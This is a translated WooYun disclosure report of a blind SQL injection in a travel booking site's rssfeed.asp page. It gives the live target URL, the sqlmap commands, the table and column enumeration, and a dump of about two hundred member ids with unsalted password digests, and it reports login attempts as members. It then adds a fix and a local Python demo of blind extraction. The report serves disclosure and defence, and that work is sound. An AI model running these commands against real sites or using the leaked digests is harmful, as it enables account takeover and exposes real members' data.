
Vulnerability summary

Defect ID: wooyun-2015-0154667

Title: SQL injection in 易联假期旅行网 (easy-linkholiday.com) leaks member information

Vendor: 易联假期旅行网

Author: 终于乌云了

Submitted: 2015-11-23 19:51

Fix deadline: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-23: vendor contacted, awaiting acknowledgement; details withheld from the public
2016-01-11: vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

易联假期旅行网 has a SQL injection that leaks member information and allows member points to be stolen.

Detailed description:

Test: sqlmap -u "http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196"

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=15196 AND 2705=2705
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

The injection is boolean-based blind: the feed item for id=15196 still renders when a true condition (AND 2705=2705) is appended and disappears when a false one (for example AND 2705=2706) is, so data is recovered one yes/no answer at a time. Because the back end is Microsoft Access there is no schema catalogue to query; sqlmap instead brute-forces table and column names from a wordlist of common names, which is what the "guessing" runs below are.

Proof of concept:

Guessing the table names:
sqlmap -u "http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196" --tables

[5 tables]
+-------+
| group |
| order |
| user  |
| hotel |
| room  |
+-------+


Guessing the column names of the user table:
sqlmap -u "http://www.easy-linkholiday.com/gbhotel/rssfeed.asp?id=15196" -T user --columns

Table: user
[10 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| address  | non-numeric |
| age      | non-numeric |
| cardid   | numeric     |
| email    | non-numeric |
| groupid  | numeric     |
| id       | numeric     |
| name     | non-numeric |
| password | non-numeric |
| phone    | non-numeric |
| zip      | non-numeric |
+----------+-------------+


Part of the user table, dumped with a tool:

[1.jpg: screenshot of the partial dump, not reproduced]


More data (output of a second, Access-oriented injection tool, translated):

Congratulations, this URL is injectable!
Database type: Access
Note 1: all table names guessed!
Note 2: all column names guessed!
Column-name guessing stopped!
Range: 1001 records in total!

cardid  password
2       77804d2ba1922c33
3       76fe6afa2b5786d8
27      6ece12c68811f583
30      0349550c8f24f6a0
38      0a4303964c42228e
42      0d99f73951cb976b
45      7322a4bb7db612af
56      c9a858eb305e0fd0
205     f8ded4e9bee409e3
345     6fc975aa09627918
583     0beee9022b252152
678     2c0d5ba7aafad928
755     dfcadd60576e9364
756     a237a5508d3477c0
763     404ad0a3bd4558d0
1025    4a25ee7029e3a394
1027    b4d22a7add958f2d
1059    38dbe374195d41c0
1075    582fc240dd2674a7
1105    8726c758afd5a019
1109    65ae4cf87d02c8b6
1115    d82b1d6b0e7a2047
1116    511e46ee0313aa15
1123    996fa8d3166317d8
1126    306136be72bbec21
1128    02258595bfc6799b
1131    a01da59504cd6b4c
1136    16260774f4a5ea20
1141    0abc5e3b72dad57e
1143    a8c03af5d8cc52a2
1146    7ed4509e699831f2
1150    2f877394accb0ab5
1158    eedbbb2aaf85e879
1166    c78b03377d94ef73
1169    49ba59abbe56e057
1172    c92f93f988ec98f1
1177    b6b0596c89958861
1178    68136d4e2321160a
1183    187b62d14b9eb6c3
1187    a898337ee043b43d
1190    1b1adea23c7ba3aa
1200    08a6b3799a3d9c72
1201    da87ac39d782741c
1222    c58c092fb14aa0ae
1237    7412b5da7be0cf42
1239    a44a0e34e200a9ca
1259    0fb1704ae09709c7
1276    965eb72c92a549dd
1277    e9fa85325fdda277
1315    5d4585fba82e7ad6
1318    58fb408f40652fcf
1319    61fb35dbccf4250f
1322    96ef568f6b6dd976
1323    2301471f071ab51b
1331    af4edf56835b0de3
1333    5e8085b3ffb9e6bc
1335    8420d779506797ae
1339    c831b04de153469d
1343    020def1e169895f2
1346    a77325c90d261ecc
1351    b385d7aaba4c3319
1355    243979bbcca6458c
1362    c831b04de153469d
1363    699d9acfb37432a1
1367    c2e8b9f86b2b44a8
1373    1484d216ea4f6992
1380    f2d731fbf8ee0ad3
1381    1be5cb12e9de66b8
1500    4430431812f52c60
1506    8726c758afd5a019
1509    642e728e0afc9ebb
1511    0bea80da13eaafe6
1515    c7985b55a15a064d
1516    8e0b12a7d09ebb0d
1521    1fcb4197b13dc703
1525    5ff82d8e4c374cd8
1528    54f00bd0c3885046
1536    1ca161bd0d58079d
1539    cf3f07aadf2943cf
1555    61b63625eab8e04f
1556    30bbce89226ea245
1561    184aa8efa27c903e
1571    711ef1d811175e86
1572    a0ba0ffe3b078048
1577    2a641d4612be929e
1578    7cfbe645d359a952
1582    ca1b998becac9e8e
1585    a10b4324edf717d7
1597    e782bac5c684ee0b
1598    a8adef2469f3ee2a
1599    259277e14e1bf6ef
1672    2b4567463ffaade7
1682    903e1b05fdc8bbc8
1699    e5dd1ca5e114e141
1808    5e0abe00146e3b3b
1815    8cf5556c77d39bc8
1816    11402592ccdaa291
1817    65b72aeb2aacfecb
1818    c8129a189e121167
1819    2e000d4f9919bd70
1830    c0890f09631257da
1840    7c68f2fd575959dc
1841    8732da05928c3d37
1842    fa0d3cd8ec84a91a
1845    68216395c9a2e0e0
1846    98f46fe10ff2966b
1848    f46a022ae53e5076
1850    4daef6e95e7a90e8
1853    4caaf4e6ff3a1447
1855    3120da587687eb36
1860    8937967842b4dc81
1872    9407a430d1f50e80
1877    62d4732e8f27f67c
1883    776aae51768dec8f
1885    c583444ba6045cd1
1888    13fbab8dc8353d62
1889    6b6881c370e3992b
1909    528e6e59aa3584c2
1912    7e5b5968ec213e41
1960    1afefeea63b805dd
2104    304a25071085d8c7
2106    63b27ec106195c96
2111    49282c5c77b73614
2118    99df8a0ba671e2ae
2188    14ff3279b8a7ed7a
2219    f95470081bf6cc03
2229    cbcb69c63a629611
2232    8bd8956e8c38bc42
2238    54c5590b04df411b
2243    a60d0bc938f9af32
2258    5f6ce7b83b990904
2265    21d5f24fbe2771c2
2267    8fae8810eb21e6c5
2288    d87a736f87910399
2301    164a3bb649eb5f7e
2327    fa529d7273da0db6
2360    410940b0c120ab8e
2367    8a31a6a26ea0e142
2382    a9bce24e156d6724
2387    faaf9f1920d51e7d
2396    b8e75542c08d9db7
2397    3f61b0e681241975
2399    0dc7d353b9b81ce4
2405    23053e691712a171
2410    fb4a69ccf869c4d9
2415    d29bf3b7b91b3a6e
2417    7d373ca58e9bada0
2545    99eb1bb596f617da
2651    9ed11bdd33f01ca6
2653    5b279647579b75a3
2680    445c833caaad5ea0
2705    5e3c717072b35d00
2753    611602a90fa866a2
2877    41e9c312f9db2ac0
2899    2b2c5380e3d86b0f
2988    7c4511dcdfc7b021
2999    1076228db9e8ecd4
3100    464c0063036d3cc1
3171    116aa257b9bd2c46
3177    2a4ca0714003dc11
3195    47d37ba24e562db4
3223    672d7f27e545fd23
3229    3679aaa93980d9e9
3235    68db799d51ecae84
3251    0633b88d6e8b8dad
3253    79c8cbdbbb0f3239
3255    b2c2f7a4fde64b51
3257    d7a84a9b5c2405f2
5005    14e8c343b98ac7ed
5011    ffea9ff0fed12666
5026    c0776caddd2afd2f
5032    a10ffecef011330a
5033    792fa2f9cb596e46
5057    f64264859dfa00f3
5101    df3748ac9b6d57a5
5107    080e51e9367fa69d
5115    120afb2b93f4f99e
5117    52d04dc20036dbd8
5128    0e766d2b613fe11a
5155    dfa87db18ce10732
5160    974d217e8fa22a87
5165    f361fa5aab37e50c
5187    f6e5ba6cc8c8b1ea
5196    e0a766df71533140
5262    74798e3c4dd02bc4
5350    2ac330a7455809c6
5359    f007db7a235d7020
5447    cb8d2ffd28b0c04c
5461    e8d62d2715d27f46
5467    04b84832ba173f39
5468    9eb774de14020b4d
5473    18da6acf0e2a6a93
5480    2bef02a23c624483
5486    53f50ee875273e4c
5491    058199aa4dbff447
5495    0829c0639ddd8853
5505    27d7fe15a4bbf275
5510    11e3545a0dedcbb2
5512    2e5a3e99fbe3d2d6
5515    e766276fee0f229a
5525    78032da583f74960
5527    fd927059742ef6ad
5533    de91f97d8ef36bf4
5541    8c731c870e97170f
5546    39b2c80682e113d8
5547    21cc5e8f5c5c607f
5553    8df3080435e4ef10
5556    81c1505d8a769530
5560    0c5e6aa64b074f0b
5563    1ace8b346daaa1b1
5567    9aac4b898d947959
5571    61f80af78e9775b7
5590    f0d2c7859462abff
5601    1c6a823df321a7b2
5603    95fb8590b83ce5f9
5640    8e9de04a575fc437
5641    0d481bc12912324a
5650    a8b5a3a89d68f74c
5661    ff6e26420fa28914
5668    c452ba8906a5fa65
5735    ecfd8cbb5fd2fcfb
6357    df9f8559140cc48e
6363    a1881125e655c8c9
6365    edc8c78d1ca783de
6386    2c75b23dc963c7eb
6392    920081b616cf591d
6393    (the dump is cut off here in the original)


The password column holds 16-hex-character digests rather than plaintext passwords (most likely the truncated 16-character MD5 that ASP applications of that era commonly used; the report does not say). The same digest appears for different members (cardid 1339 and 1362; cardid 1105 and 1506), so the hashes are unsalted: members with the same password collide, and the whole dump can be cracked against one precomputed table.

Attempting to log in as a member:

[2.jpg, 3.jpg, 4.jpg, 5.jpg: screenshots of the login attempt, not reproduced]

Fix:

Input filtering or encoding alone is not a reliable fix. Build the query with a parameterised ADODB.Command (a typed Parameter for id) instead of concatenating Request("id") into the SQL text, and reject any id that is not an integer before it reaches the database. Because the dump shows unsalted 16-character digests, stored passwords should also be rehashed with a salted, slow algorithm (bcrypt or PBKDF2) as members next log in.
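As an added example (not from the report and not the site's own code), the following Python script reproduces both the boolean-based blind technique sqlmap reported above and the parameterised query the fix calls for. It assumes rssfeed.asp concatenates the id parameter into its SQL, which the report implies but does not show. sqlite3 stands in for Microsoft Access, with Access's MID() and ASC() registered as user-defined functions so the payloads are valid Access SQL; the hotel table, the user table and its columns, and the digest for cardid 2 come from the report, and every other row value is constructed filler.

```python
"""Boolean-based blind SQL injection against a string-concatenated query,
plus the parameterised form that defeats the same payload.

Stand-in for the classic ASP + Microsoft Access site in the report: sqlite3
plays the role of Access, and MID()/ASC() are registered so the Access-dialect
payloads below run unchanged. Table/column names come from the report; the
row contents are constructed except for the cardid 2 digest.
"""
import sqlite3


def build_db():
    """In-memory stand-in for the Access database behind rssfeed.asp."""
    con = sqlite3.connect(":memory:")
    # Access's MID(str, start, len) is 1-based; ASC(str) is the code of the first char.
    con.create_function("MID", 3, lambda s, start, n: None if s is None else s[start - 1:start - 1 + n])
    con.create_function("ASC", 1, lambda s: None if not s else ord(s[0]))
    con.executescript(
        """
        CREATE TABLE hotel (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO hotel VALUES (15196, 'constructed sample hotel');
        CREATE TABLE [user] (id INTEGER PRIMARY KEY, cardid INTEGER,
                             name TEXT, password TEXT);
        INSERT INTO [user] VALUES (1, 2, 'constructed member', '77804d2ba1922c33');
        """
    )
    return con


def vulnerable_rssfeed(con, id_param):
    """rssfeed.asp as the report implies it is written (an assumption): the
    query-string value is pasted straight into the SQL text."""
    return con.execute("SELECT name FROM hotel WHERE id=" + id_param).fetchall()


def safe_rssfeed(con, id_param):
    """Hardened handler: validate the type, then bind the value as a parameter.
    In classic ASP the same shape is an ADODB.Command with a typed Parameter."""
    if not id_param.isdigit():
        raise ValueError("id must be an integer")
    return con.execute("SELECT name FROM hotel WHERE id=?", (int(id_param),)).fetchall()


class BlindOracle:
    """One yes/no question per request: did the feed item for id=15196 render?"""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        return len(vulnerable_rssfeed(self.con, f"15196 AND {condition}")) > 0


def confirm_injection(oracle):
    """sqlmap's check from the report: a true tautology keeps the item and a
    false one drops it. Both must hold or the parameter is not a usable oracle."""
    return oracle.ask("2705=2705") and not oracle.ask("2705=2706")


def extract_password(oracle, cardid, length=16):
    """Recover one member's 16-character digest one character at a time.

    Each position is a binary search over the ASCII code using Access's MID()
    and ASC(), so a character costs seven requests rather than one per
    candidate value."""
    sub = f"(SELECT password FROM [user] WHERE cardid={cardid})"
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127  # invariant: the character code lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"ASC(MID({sub},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    oracle = BlindOracle(build_db())
    print("injectable:", confirm_injection(oracle))
    print("cardid 2 digest:", extract_password(oracle, 2), "in", oracle.requests, "requests")
    try:
        safe_rssfeed(oracle.con, "15196 AND 2705=2705")
    except ValueError as exc:
        print("hardened handler rejected the payload:", exc)
```

Against the real endpoint each oracle.ask would be one HTTP GET to rssfeed.asp with the condition appended to id=15196, compared with the baseline page; that is what sqlmap automated here, and the request counter shows why a 16-character digest costs about 112 requests rather than 16 times 128.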

Copyright notice: when reposting, credit the source: 终于乌云了@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused the report